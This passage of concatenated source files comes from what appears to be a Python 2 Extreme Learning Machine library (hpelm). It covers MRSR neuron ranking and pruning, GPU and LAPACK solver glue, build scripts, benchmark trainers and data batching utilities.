e2 = np.ones((nn,)) * -1
e3 = np.ones((nn,)) * -1
for k in xrange(1,nn):
rank1 = rank[:k]
HH1 = HH[rank1, :][:, rank1]
HT1 = HT[rank1, :]
B = self._solve(HH1, HT1)
Yv = np.dot(Hv[:, rank1], B)
errors[k] = self._error(Yv, Tv)
e2[k] = self._error(Yv, Tv)
e3[k] = e2[k] + k*penalty
plt.plot(range(1,nn), e2[1:], '-k')
plt.plot(range(1,nn), e3[1:], '-r')
# MYOPT function
# [A B C D E] interval points,
# halve the interval each time
# init part
e = np.ones((nn,)) * -1 # error for all numbers of neurons
er = np.ones((nn,)) * -1 # error for all numbers of neurons
A = 1
E = nn-1
l = E - A
B = A + l/4
C = A + l/2
D = A + 3*l/4
while True:
for idx in [A, B, C, D, E]: # calculate errors at points
if e[idx] == -1:
e[idx] = error_v(idx, er, rank, HH, HT, Hv, Tv, penalty)
m = min(e[A], e[B], e[C], e[D], e[E]) # find minimum element
if m in (e[A], e[B]): # halve the search interval
E = C
C = B
elif m in (e[D], e[E]):
A = C
C = D
else:
A = B
E = D
l = E - A
B = A + l/4
D = A + (3*l)/4
# minimum is found
if l < 3:
break
k_opt = [k for k in [A, B, C, D, E] if e[k] == m][0] # find minimum index
best_nn = rank[:k_opt]
plt.plot([i for i in range(nn) if e[i]>0], [e1 for e1 in e if e1 > 0], "dm")
self._prune(best_nn)
self.Beta = self._solve(self.project(X), T)
print "%d of %d neurons selected with a validation set" % (len(best_nn), nn)
if len(best_nn) > nn*0.9:
print "Hint: try re-training with more hidden neurons"
plt.show()
<file_sep># -*- coding: utf-8 -*-
"""Multiresponse Sparse Regression algorithm in Python
Uses np library from Python
| Input:
| **T** is an (n x p) matrix of targets. The columns of T should
have zero mean and same scale (e.g. equal variance).
| **X** is an (n x m) matrix of regressors. The columns of X should
have zero mean and same scale (e.g. equal variance).
| **kmax** is an integer fixing the number of steps to be run, which
equals to the maximum number of regressors in the model.
| Output:
| **W** is an (m x p*kmax) sparse matrix of regression
coefficients. It can be converted to full matrix by command
full(W). Regression coefficients of the k:th step are given
by W(:,(k-1)*p+1:k*p).
| **i1** is a (1 x kmax) vector of indices revealing the order in
which the regressors enter model.
The estimates for T may be obtained by Y = X*W, where the k:th
estimate Y(:,(k-1)*p+1:k*p) uses k regressors.
| Reference:
| <NAME>, <NAME>. Multiresponse sparse regression with
application to multidimensional scaling. International Conference
on Artificial Neural Networks (ICANN). Warsaw, Poland. September
11-15, 2005. LNCS 3697, pp. 97-102.
Copyright (C) 2005 by <NAME> and <NAME>.
This function is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 2 of
the License, or any later version.
The function is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the `GNU
General Public License <http://www.gnu.org/copyleft/gpl.html>`_
for more details.
"""
import numpy as np
def mrsr(X, T, kmax):
n,m = X.shape
n,p = T.shape
kmax = min(kmax, m)
if p > 15:
print "Too many targets (%d) - MRSR has O(2^targets) complexity"
""" print "Reducing to 15 randomly selected targets (6x slowdown)"
print "Using max 10 targets (1.08x slowdown) recommended"
ti = np.arange(p)
np.random.shuffle(ti)
ti = ti[:15]
T = T[:,ti]
p = 15
"""
i1 = np.array([], dtype = np.int32)
i2 = np.arange(m).astype(np.int32)
XT = np.dot(X.T,T)
XX = np.zeros([m, m])
S = np.ones([2**p, p])
S[0:2**(p-1), 0] = -1
for j in np.arange(1, p):
S[:, j] = np.concatenate((S[np.arange(1, 2**p, 2), j-1], S[np.arange(1, 2**p, 2), j-1]))
# Make the first step
A = np.transpose(XT)
cmax = np.amax(abs(A).sum(0), 0)
cind = np.argmax(abs(A).sum(0), 0)
A = np.delete(A, cind, 1)
ind = int(i2[cind])
i2 = np.delete(i2, cind)
i1 = np.append(i1, ind)
# here Xi1 and Xi2 are just faster alternatives to X[:,i1] and X[:,i2]
Xi2 = X.copy(order='F') # column-contiguous copy of X
Xi2[:, cind:-1] = Xi2[:, cind+1:]; Xi2 = Xi2[:,:-1] # delete <cind> col
Xi1 = X[:,ind].reshape((n,1)) # add 1 column at a time
XX[np.ix_([ind], [ind])] = np.dot(X[:,ind], X[:,ind])
invXX = 1 / XX[ind, :][ind]
Wols = invXX * XT[ind, :]
Yols = np.dot(Xi1, np.reshape(Wols, (1,-1)))
B = np.dot(Yols.T, Xi2)
G = (cmax+np.dot(S,A))/(cmax+np.dot(S,B))
g = G[G>=0].min()
Y = g*Yols
# Rest of the steps
for k in np.arange(2,kmax+1):
#print "calculating rank %d/%d" % (k-1, kmax)
#print "mrsr %d/%d" % (k+1, kmax)
A = np.dot((T-Y).T, Xi2) # true slow
cmax = np.amax(abs(A).sum(0), 0)
cind = np.argmax(abs(A).sum(0), 0)
A = np.delete(A, cind, 1)
ind = int(i2[cind])
i2 = np.delete(i2, cind)
i1 = np.append(i1, ind)
#Xi1 = np.hstack((Xi1, X[:,ind].reshape((n,1), order='C'))) # slow for large k
Xi1 = np.hstack((Xi1, X[:,ind].reshape((-1,1)))) # slow for large k
xX = np.dot(X[:, ind].T, Xi1)
XX[np.ix_([ind], i1)] = xX
XX[np.ix_(i1, [ind])] = np.reshape(xX, (i1.size, -1))
v3 = XX.take(i1,axis=0).take(i1,axis=1) # XX[i1, :][:, i1]
#v3 = XX[i1, :][:, i1]
try:
invXX = np.linalg.inv(v3)
except np.linalg.linalg.LinAlgError:
print 'got singular matrix, using pinv()', i1
invXX = np.linalg.pinv(v3)
Wols = np.dot(invXX, XT.take(i1,axis=0))
Yols = np.dot(Xi1, Wols) # true slow
# deletes [cind] row, slow for large k
Xi2[:, cind:-1] = Xi2[:, cind+1:]; Xi2 = Xi2[:,:-1]
B = np.dot((Yols-Y).T, Xi2) # true slow
G = (cmax + S.dot(A)) / (cmax + S.dot(B)) # true slow for many outputs
# now we remove that line using a condition:
# G = numpy.concatenate(([2*(k==m)-1], G.flatten()), 1)
if k == kmax: # G[G>=0] is empty if k==kmax; empty.min() will give error
Y = Yols
else:
g = G[G>=0].min()
Y = (1-g)*Y+g*Yols
return i1
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Oct 18 17:21:12 2014
@author: akusok
"""
from setuptools import setup, Extension
#from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='hpelm',
version='0.6.22',
description='High-Performance implementation of an\
Extreme Learning Machine',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Topic :: Scientific/Engineering :: Information Analysis',
],
keywords='ELM HPC regression classification ANN',
url='https://www.researchgate.net/profile/Anton_Akusok',
author='<NAME>',
author_email='<EMAIL>',
license='BSD (3-clause)',
packages=['hpelm',
'hpelm.modules',
'hpelm.tests',
'hpelm.acc'],
install_requires=[
'numpy',
'numexpr',
'scipy>=0.12',
'tables',
'cython'
],
scripts=['bin/elm_naive.py'],
test_suite='nose.collector',
tests_require=['nose'],
include_package_data=True,
zip_safe=False)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Thu Nov 6 16:15:27 2014
@author: akusok
"""
def gen(k=None):
print "starting"
for i in range(3):
print "generating i: ", i
yield i
print "finalizing", k
def gen2():
d = 1
return d, gen()
###############################
g = gen()
print list(g) # finalizes!
###############################
g = gen()
for g1 in g:
print g1 # finalizes!
###############################
d,g = gen2()
print "d = ", d
for g1 in g:
print g1
###############################
f = gen('f')
g = gen('g')
for a,b in zip(f,g):
print a,b # only F finalizes!
###############################
print "+++++++++++++++++"
f = gen('f')
g = gen('g')
for a in f:
b = g.next()
print a,b # only F finalizes!
print "#################"
print "#################"
class C1():
a = 3
def pa(self):
print "local a is", self.a
def pb(self):
print "non-local b is", self.b
class C2(C1):
b = 5
c2 = C2()
c2.pa()
c2.pb()
c1 = C1()
c1.pa()
<file_sep>#!/usr/bin/env python
from distutils.core import setup
from distutils.extension import Extension
import commands
def pkgconfig(*packages, **kw):
flag_map = {'-I': 'include_dirs', '-L': 'library_dirs', '-l': 'libraries'}
for token in commands.getoutput("pkg-config --libs --cflags %s" % ' '.join(packages)).split():
if token[:2] in flag_map:
kw.setdefault(flag_map.get(token[:2]), []).append(token[2:])
else:
kw.setdefault('extra_compile_args', []).append(token)
return kw
print pkgconfig("magma")
<file_sep>#include "magma.h"
class GpuSolver {
public:
GpuSolver( int, int );
~GpuSolver();
void add_data( int m, double* X, double* T );
void solve( double* X );
};
<file_sep>#include "magma.h"
class GpuSolver {
public:
GpuSolver( int, int, double* A, double* B );
void add_data( int m, double* X, double* T );
void get_corr( double* XX, double* XT );
void solve( double* X );
void finalize();
};
void solve_corr( int n, int nrhs, double* A, double* B, double* X );
<file_sep>#!/usr/bin/env python
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import commands
import numpy
def pkgconfig(*packages, **kw):
"""Returns nicely organized stuff from PKGCONFIG.
Found on the internet, returns a dictionary with
libraries, library dirs, include dirs, extra arguments
To test, run in terminal: "pkg-config --libs --cflags magma"
To add "magma" to pkg-config:
export PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/usr/local/magma/lib/pkgconfig
use your own path to installed magma + lib/pkgconfig
"""
flag_map = {'-I': 'include_dirs', '-L': 'library_dirs', '-l': 'libraries'}
for token in commands.getoutput("pkg-config --libs --cflags %s" % ' '.join(packages)).split():
if token[:2] in flag_map:
kw.setdefault(flag_map.get(token[:2]), []).append(token[2:])
else:
kw.setdefault('extra_compile_args', []).append(token)
return kw
setup(cmdclass={'build_ext': build_ext},
ext_modules=[
Extension(
"magma_solver",
sources=["magma_solver.pyx",
"gpu_solver.cpp"],
language="c++",
extra_compile_args=pkgconfig("magma")["extra_compile_args"],
include_dirs=[numpy.get_include()] + pkgconfig("magma")["include_dirs"],
libraries=pkgconfig("magma")["libraries"],
library_dirs=pkgconfig("magma")["library_dirs"])
]
)
"""
setup(cmdclass = {'build_ext': build_ext},
ext_modules = [
Extension("magma_solver",
sources = ["magma_solver.pyx", "gpu_solver.cpp"],
language="c++",
extra_compile_args=["-DADD_ -DHAVE_CUBLAS"],
include_dirs = [numpy.get_include(),
"/usr/local/magma/include",
"/usr/local/cuda-6.5/include",
"/opt/intel/composerxe/mkl/include"],
libraries = ["magma",
"mkl_intel_lp64",
"mkl_intel_thread",
"mkl_core",
"iomp5",
"pthread",
"cublas",
"cudart",
"stdc++",
"gfortran",
"m"],
library_dirs = ["/usr/local/magma/lib",
"/opt/intel/composerxe/mkl/lib/intel64",
"/usr/local/cuda-6.5/lib64",
"/opt/intel/composerxe/lib/intel64"]
)
]
)
"""<file_sep>#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <Accelerate/Accelerate.h> // replace with proper Lapack headers
void load_file(double *X, int n, int d)
{
FILE *myfile;
myfile = fopen("X.bin","r");
fread(X, sizeof(double), n*d, myfile);
fclose(myfile);
printf("X: \n");
/*for (int i=0; i<M; i++) {
for (int j=0; j<N; j++) {
printf("%f ", U[i + j*M]);
}
printf("\n");
}*/
}
void my_lls()
{
// M - number of samples
// N - number of columns
int M = 10000;
int N = 5;
int d = sizeof(double);
double *A = (double*) malloc(M*N*d);
double *s = (double*) malloc(N*d);
double *U = (double*) malloc(M*N*d);
double *VT = (double*) malloc(N*N*d);
FILE *myfile;
myfile = fopen("A.bin","r");
fread(A, d, M*N, myfile);
fclose(myfile);
char S = 'S';
int lwork = M + 3*N;
lwork = (lwork < 5*N) ? 5*N : lwork;
double *work = (double*) malloc(lwork*d);
int info;
// correct SVD
dgesvd_(&S, &S, &M, &N, A, &M, s, U, &M, VT, &N, work, &lwork, &info);
//*********************************************************************
myfile = fopen("A.bin","r");
fread(A, d, M*N, myfile);
fclose(myfile);
int K = 2;
double *B = (double*) malloc(M*K*d);
for (int i=0; i<M; i++) {
B[i] = A[i];
B[M+i] = A[M+i];
}
double *C = (double*) malloc(N*K*d);
// correct dgemm
cblas_dgemm(CblasColMajor, CblasTrans, CblasNoTrans, N, K, M, 1.0, A, M, B, M, 0.0, C, N);
//*********************************************************************
/*
for (int i=0; i<M; i++) {
for (int j=0; j<N; j++) {
printf("%f ", U[i + j*M]);
}
printf("\n");
}
*/
}
void my_new()
{
FILE *myfile;
int M = 10000;
int N = 5;
int K = 2;
int d = sizeof(double);
double* H = (double*) malloc(M*N*d);
double* Y = (double*) malloc(M*K*d);
double* s = (double*) malloc(N*d);
double rcond = -1.0;
int rank;
int info;
myfile = fopen("H.bin","r");
fread(H, d, M*N, myfile);
fclose(myfile);
myfile = fopen("Y.bin","r");
fread(Y, d, M*N, myfile);
fclose(myfile);
int lwork = -1;
double *work = (double*) malloc(2*d);
dgelss_(&M, &N, &K, H, &M, Y, &M, s, &rcond, &rank, work, &lwork, &info); // lwork query
lwork = (int) work[0];
work = (double*) malloc(lwork*d);
// correct Least Squares Solution
dgelss_(&M, &N, &K, H, &M, Y, &M, s, &rcond, &rank, work, &lwork, &info);
// return projection matrix
double* W = (double*) malloc(N*K*d);
for (int i=0; i<N; i++) {
for (int j=0; j<K; j++) {
W[i + j*N] = Y[i + j*M];
}
}
myfile = fopen("W.bin","w");
fwrite(W, d, N*K, myfile);
fclose(myfile);
printf("%d\n", info);
}
int main()
{
my_new();
}
<file_sep># -*- coding: utf-8 -*-
"""
Created on Tue Apr 14 20:15:12 2015
@author: akusok
"""
import numpy as np
import os
import hpelm
import cPickle
import sys
from time import time
def elm(folder, i, nn, param):
# folder = os.path.join(os.path.dirname(__file__), folder)
# acc = np.empty((10, 3))
# get file names
Xtr = np.load(os.path.join(folder, "xtrain_%d.npy" % (i + 1)))
Xts = np.load(os.path.join(folder, "xtest_%d.npy" % (i + 1)))
Ttr = np.load(os.path.join(folder, "ytrain_%d.npy" % (i + 1)))
Tts = np.load(os.path.join(folder, "ytest_%d.npy" % (i + 1)))
# create validation set
# N = Xtr.shape[0]
# ix = np.arange(N)
# np.random.shuffle(ix)
# Xvl = Xtr[ix[:N/5]]
# Tvl = Ttr[ix[:N/5]]
# Xtr = Xtr[ix[N/5:]]
# Ttr = Ttr[ix[N/5:]]
# elm.add_neurons(Xtr.shape[1], "lin")
# W, B = hpelm.modules.rbf_param(Xtr, nn, "l2")
# elm.add_neurons(nn, "rbf_l2", W, B)
nn = min(nn, Xtr.shape[0]/2)
t = time()
# build ELM
elm = hpelm.ELM(Xtr.shape[1], Ttr.shape[1])
elm.add_neurons(nn, "sigm")
# train ELM
elm.train(Xtr, Ttr, *param)
Yts = elm.predict(Xts)
err = elm.error(Yts, Tts)
t = time() - t
nns = [l[1] for l in elm.neurons]
return err, nns, t
def trainer(folder, cls=False):
nn = 100
errs = np.zeros((10, 3))
neurs = np.zeros((10, 3), dtype=np.int)
times = np.zeros((10, 3))
if cls:
param = ['c']
else:
param = []
for i in xrange(10):
print i
e, l, t = elm(folder, i, nn, param)
errs[i, 0] = e
neurs[i, 0] = l[0]
times[i, 0] = t
e, l, t = elm(folder, i, nn, param+['loo'])
errs[i, 1] = e
neurs[i, 1] = l[0]
times[i, 1] = t
e, l, t = elm(folder, i, nn, param+['OP', 'loo'])
errs[i, 2] = e
neurs[i, 2] = l[0]
times[i, 2] = t
stds = errs.std(0)
errs = errs.mean(0)
neurs = neurs.mean(0)
times = times.mean(0)
fname = folder+".pkl"
cPickle.dump((errs, stds, neurs, times), open(fname, "wb"), -1)
if __name__ == "__main__":
datas = (("Classification-Iris", True),
("Classification-Pima_Indians_Diabetes", True),
("Classification-Wine", True),
("Classification-Wisconsin_Breast_Cancer", True),
("Regression-Abalone", False),
("Regression-Ailerons", False),
("Regression-Auto_price", False),
("Regression-Bank", False),
("Regression-Boston", False),
("Regression-Breast_cancer", False),
("Regression-Computer", False),
("Regression-CPU", False),
("Regression-Elevators", False),
("Regression-Servo", False),
("Regression-Stocks", False))
j = int(sys.argv[1])
f1, c1 = datas[j]
f1 = "/Users/akusok/Dropbox/Documents/X-ELM/hpelm/datasets/" + f1
trainer(f1, c1)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
import numexpr as ne
from scipy.spatial.distance import cdist
from multiprocessing import Pool, cpu_count
import os
from slfn import SLFN
class parallel_cdist(object):
def __init__(self, W, kind):
self.C = W.T
self.kind = kind
def __call__(self, X):
return cdist(X, self.C, self.kind)
class ELM(SLFN):
"""Non-parallel Extreme Learning Machine.
"""
# inherited def __init__(self, inputs, outputs):
# inherited def _checkdata(self, X, T):
# inherited def add_neurons(self, number, func, W=None, B=None):
# inherited def project(self, X):
# inherited def predict(self, X):
# inherited def save(self, model):
# inherited def load(self, model):
def _mp_project(X, W, B, k, kind):
pcdist = parallel_cdist(W, kind)
# fix issues with running everything on one core
os.system("taskset -p 0xff %d >/dev/null" % os.getpid())
p = Pool(k)
H0 = p.map(pcdist, np.array_split(X, k, axis=0))
H0 = np.vstack(H0) / (-2 * (B ** 2))
p.close()
return H0
def project(self, X):
# assemble global hidden layer output
H = []
for func, ntype in self.neurons.iteritems():
_, W, B = ntype
k = cpu_count()
# projection
if func == "rbf_l2":
H0 = self._mp_project(X, W, B, k, "sqeuclidean")
elif func == "rbf_l1":
H0 = self._mp_project(X, W, B, k, "cityblock")
elif func == "rbf_linf":
H0 = self._mp_project(X, W, B, k, "chebyshev")
else:
H0 = X.dot(W) + B
# transformation
if func == "lin":
pass
elif "rbf" in func:
ne.evaluate('exp(H0)', out=H0)
elif func == "sigm":
ne.evaluate("1/(1+exp(-H0))", out=H0)
elif func == "tanh":
ne.evaluate('tanh(H0)', out=H0)
else:
H0 = func(H0) # custom <numpy.ufunc>
H.append(H0)
H = np.hstack(H)
return H
def train(self, X, T):
"""Learn a model to project inputs X to targets T.
:param X: - matrix of inputs
:param T: - matrix of targets
"""
assert len(self.neurons) > 0, "Add neurons before training ELM"
X, T = self._checkdata(X, T)
H = self.project(X)
self.Beta = np.linalg.pinv(H).dot(T)
''' COPY OF OLD PRUNING METHODS
def prune_op(self, X, T, batch=10000, delimiter=" "):
"""Prune ELM as in OP-ELM paper.
"""
# get data iterators
genX, self.inputs, N = batchX(X, batch, delimiter)
genT, self.targets = batchT(T, batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
nfeats = []
neurons = np.zeros((nn,))
for X1,T1 in zip(genX, genT):
# get hidden layer outputs
H = np.dot(X1,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T1 = semi_Tikhonov(H,T1,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
rank = mrsr(H, T1, nn)
# select best number of neurons
MSE = press(H[:, rank[:2]], T1, self.classification, self.multiclass)
R_opt = rank[:2]
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
r = rank[:i]
mse1 = press(H[:,r], T1, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = r
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
r = R_opt
# save number of neurons and their ranking information
nfeats.append(len(r))
# first selected neuron gets weight 2, last one gets weight 1
neurons[r] += np.linspace(2,1,num=len(r))
# combine neuron ranking
nfeats = np.round(np.mean(nfeats))
neurons = np.argsort(neurons)[::-1][:nfeats] # sorting in descending order
# update ELM parameters and re-calculate B
self.W = self.W[:,neurons]
self.ufunc = [self.ufunc[j] for j in neurons]
self.train(X, T, batch=batch, delimiter=delimiter)
def prune_op2(self, X, T, norm=1, batch=10000, delimiter=" "):
"""Prune ELM with a more recent implementation of MRSR.
:param norm: - check numpy.linalg.norm(X, <norm>)
"""
# get data iterators
genX, self.inputs, N = batchX(X, batch, delimiter)
genT, self.targets = batchT(T, batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
nfeats = []
neurons = np.zeros((nn,))
for X1,T1 in zip(genX, genT):
# get hidden layer outputs
H = np.dot(X1,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T1 = semi_Tikhonov(H,T1,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
# this MRSR2 is a class, with <.rank> attribute and <.new_input()> method
M = mrsr2(H, T1, norm)
M.new_input()
M.new_input()
# select best number of neurons
MSE = press(H[:, M.rank], T1, self.classification, self.multiclass)
R_opt = M.rank
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
M.new_input()
mse1 = press(H[:, M.rank], T1, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = M.rank
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
rank = R_opt
del M
# save number of neurons and their ranking information
nfeats.append(len(rank))
# first selected neuron gets weight 2, last one gets weight 1
neurons[rank] += np.linspace(2,1,num=len(rank))
# combine neuron ranking
nfeats = np.round(np.mean(nfeats))
neurons = np.argsort(neurons)[::-1][:nfeats] # sorting in descending order
# update ELM parameters and re-calculate B
self.W = self.W[:,neurons]
self.ufunc = [self.ufunc[j] for j in neurons]
self.train(X, T, batch=batch, delimiter=delimiter)
'''
<file_sep># -*- coding: utf-8 -*-
"""
Created on Wed Nov 5 13:54:55 2014
@author: akusok
"""
import numpy as np
from tables import openFile
def encode(data, cdict):
"""Encode 1-dim classes into binary coding.
"""
try:
if isinstance(data, np.ndarray) and (len(data.shape) == 2):
data = data.ravel()
data = np.vstack([cdict[cls] for cls in data])
except:
raise IOError("Test targets cannot have classes not presented in training")
return data
def decode(data, cdict):
"""Transform binary coding into original 1-dim classes.
"""
un_cdict = {np.argmax(v): k for k, v in cdict.items()} # invert dictionary
return [un_cdict[i] for i in np.argmax(data, 1)]
def np_generator(D, batch, add_bias=False, c_dict=None):
"""Returns numpy array part-by-part
"""
N = len(D)
nb = N/batch
if N > nb*batch:
nb += 1 # add last incomplete step
for b in xrange(nb):
start = b*batch
step = min(batch, N-start)
D1 = D[start: start+step]
if add_bias:
D1 = np.hstack((D1, np.ones((step, 1), dtype=D.dtype)))
elif c_dict is not None:
D1 = encode(D1, c_dict)
yield D1
def hdf5_generator(h5, node, batch, add_bias=False, c_dict=None):
"""Reads and returns HDF5 file array part-by-part.
"""
N = node.shape[1] # HDF5 files are transposed, for Matlab compatibility
nb = N/batch
if N > nb*batch:
nb += 1 # add last incomplete step
for b in xrange(nb):
start = b*batch
step = min(batch, N-start)
D1 = node[:, start: start+step].T
if add_bias:
D1 = np.hstack((D1, np.ones((step, 1), dtype=D1.dtype)))
elif c_dict is not None:
D1 = encode(D1, c_dict)
if start+step == N:
h5.close() # closing file on last iteration
yield D1
def batchX(X, batch=10000, delimiter=" "):
"""Iterates over data X from whatever source.
batch < 0 means return a matrix instead of iterator
"""
if isinstance(X, basestring) and (X[-3:] == ".h5"): # read partially from HDF5
h5 = openFile(X)
for node in h5.walk_nodes(): # find a node with whatever name
pass
inputs = node.shape[0] # HDF5 files are transposed, for Matlab compatibility
N = node.shape[1]
if batch > 0:
bX = hdf5_generator(h5, node, batch, add_bias=True)
else:
D = node[:].T
bX = np.hstack((D, np.ones((N, 1), dtype=D.dtype)))
else: # load whole X into memory
# load text file
if isinstance(X, basestring): # any other file - must be .txt (compressed) file
if X[-3:] in ["txt", ".gz", "bz2"]:
X = np.loadtxt(X, delimiter=delimiter)
elif X[-3:] in ['npy']:
X = np.load(X)
else:
raise IOError("Input file X should be text (*.txt), " +
"a compressed text (*.gz/*.bz2), an HDF5 file " +
"(*.h5), or Numpy binary (*.npy)")
if not isinstance(X, np.ndarray):
X = np.array(X)
if len(X.shape) == 1:
X = X.reshape(-1, 1) # add second dimension
inputs = X.shape[1]
N = X.shape[0]
if batch > 0:
bX = np_generator(X, batch, add_bias=True)
else:
bX = np.hstack((X, np.ones((N, 1), dtype=X.dtype)))
# return data
return bX, inputs, N
def batchT(T, batch=10000, delimiter=" ", c_dict=None):
"""Iterates over targets T with correct transformation.
batch < 0 means return a matrix instead of iterator
:param C_dict: - dictionary of classes for single-class classification,
implies the classification task
"""
if isinstance(T, basestring) and (T[-3:] == ".h5"): # read partially from HDF5
h5 = openFile(T)
for node in h5.walk_nodes(): # find a node with whatever name
pass
targets = node.shape[0] # HDF5 files are transposed, for Matlab compatibility
if batch > 0:
bT = hdf5_generator(h5, node, batch, c_dict=c_dict)
else:
bT = node[:].T
if c_dict is not None:
bT = encode(bT, c_dict)
else: # load whole T into memory
# load text file
if isinstance(T, basestring): # any other file - must be .txt (compressed) file
if T[-3:] in ["txt", ".gz", "bz2"]:
T = np.loadtxt(T, delimiter=delimiter)
elif T[-3:] in ['npy']:
T = np.load(T)
else:
raise IOError("Targets file T should be text (*.txt), " +
"a compressed text (*.gz/*.bz2), an HDF5 file " +
"(*.h5), or Numpy binary (*.npy)")
if c_dict is None: # classification targets have their special treatment
if not isinstance(T, np.ndarray):
T = np.array(T)
if len(T.shape) == 1:
T = T.reshape(-1, 1) # add second dimension
targets = T.shape[1]
if batch > 0:
bT = np_generator(T, batch, c_dict=c_dict)
else:
bT = T
if c_dict is not None:
bT = encode(bT, c_dict)
# return data
if c_dict is not None:
targets = len(c_dict) # classification targets are unique classes
return bT, targets
def meanstdX(X, batch=10000, delimiter=" "):
"""Computes mean and standard deviation of X, skips binary features.
Only works with batch.
"""
if isinstance(X, basestring) and (X[-3:] == ".h5"): # read partially from HDF5
h5 = openFile(X)
for node in h5.walk_nodes():
pass # find a node with whatever name
N = node.shape[1] # HDF5 files are transposed, for Matlab compatibility
d = node.shape[0]
nb = N/batch
if N > nb*batch:
nb += 1 # add last incomplete step
E_x = np.zeros((d,), dtype=np.float64)
E_x2 = np.zeros((d,), dtype=np.float64)
idx_binary = range(d) # indexes of binary features
for b in xrange(nb):
start = b*batch
step = min(batch, N-start)
X1 = node[:, start: start+step].astype(np.float).T
E_x += np.mean(X1, 0) * (1.0*step/N)
E_x2 += np.mean(X1**2, 0) * (1.0*step/N)
# check which features are binary
b1 = []
for idx in idx_binary:
X1bin = X1[:, idx]
if np.abs(X1bin).max() <= 1:
if np.allclose(X1bin, X1bin.astype(np.int)):
b1.append(idx)
idx_binary = b1
meanX = E_x
E2_x = E_x**2
stdX = (E_x2 - E2_x)**0.5
h5.close() # closing file
else: # load whole X into memory
# load text file
if isinstance(X, basestring): # any other file - must be .txt (compressed) file
if X[-3:] in ["txt", ".gz", "bz2"]:
X = np.loadtxt(X, delimiter=delimiter)
elif X[-3:] in ['npy']:
X = np.load(X)
else:
raise IOError("Input file X should be text (*.txt), " +
"a compressed text (*.gz/*.bz2), an HDF5 file " +
"(*.h5), or Numpy binary (*.npy)")
if not isinstance(X, np.ndarray):
X = np.array(X)
if len(X.shape) == 1:
X = X.reshape(-1, 1) # add second dimension
idx_binary = [] # find binary features, where we skip normalization
for idx in xrange(X.shape[1]):
X1bin = X[:, idx]
if np.abs(X1bin).max() <= 1:
if np.allclose(X1bin, X1bin.astype(np.int)):
idx_binary.append(idx)
meanX = X.mean(0)
stdX = X.std(0)
N = X.shape[0]
# remove normalization of binary features
for idx in idx_binary:
meanX[idx] = 0
stdX[idx] = 1
# fix for constant input features, prevents division by zero
stdX[stdX == 0] = 1
return meanX, stdX
def c_dictT(T, batch=10000):
"""Creates dictionary of classes from any targets.
"""
if isinstance(T, basestring) and (T[-3:] == ".h5"): # read partially from HDF5
h5 = openFile(T)
for node in h5.walk_nodes():
pass # find a node with whatever name
assert node.shape[0] == 1, "Classification targets must have only one feature"
N = node.shape[1] # HDF5 files are transposed, for Matlab compatibility
if batch > 0:
nb = N/batch
if N > nb*batch:
nb += 1 # add last incomplete step
c_set = set([])
for b in xrange(nb):
start = b*batch
step = min(batch, N-start)
T1 = node[:, start: start+step].ravel()
c_set = c_set.union(set(T1))
else:
c_set = set(node[:].ravel())
h5.close() # closing file
else: # load whole T into memory
# load text file
if isinstance(T, basestring): # any other file - must be .txt (compressed) file
if T[-3:] in ["txt", ".gz", "bz2"]:
with open(T) as f:
T = f.readlines()
elif T[-3:] in ['npy']:
T = np.load(T)
else:
raise IOError("Targets file T should be text (*.txt), " +
"a compressed text (*.gz/*.bz2), an HDF5 file " +
"(*.h5), or Numpy binary (*.npy)")
if isinstance(T, np.ndarray):
assert (len(T.shape) == 1) or (T.shape[1] == 1), "Classification targets must have only 1 feature"
if len(T.shape) == 2:
T = T.ravel() # make targets 1-dimensional
c_set = set(T)
classes = list(c_set)
C = len(classes)
temp = np.eye(C)
C_dict = {classes[i]: temp[i] for i in xrange(C)}
return C_dict
<file_sep>#include "magma.h"
void gpu_solve( magma_int_t n, magma_int_t nrhs, magmaDouble_ptr A, magmaDouble_ptr B, magmaDouble_ptr X );<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Jan 6 19:05:03 2014
@author: akusoka1
"""
import numpy as np
import os
#from f_apply import f_apply
"""
n = 100000
k = 2000
H = np.ones((n,k))
f = np.random.randint(0,2,size=(k,)).astype(np.int32)
f_apply(H,f)
"""
'''
D_GE_TRI - inverse from triangular factorization
D_GE_LS - solve over- or under-determined linear system
D_GE_SVD - SVD of a matrix
'''
H = np.random.randn(100,5)
Y = np.random.randn(100,2)
H.astype(np.float64).tofile("H.bin")
Y.astype(np.float64).tofile("Y.bin")
os.system("gcc my_svd.c -o mysvd -framework accelerate && ./mysvd")
from scipy.linalg.lapack import dgelss
v,x,s,rank,work,info = dgelss(H,Y)
#print v.shape, x.shape, s.shape, rank, work, info
W = x
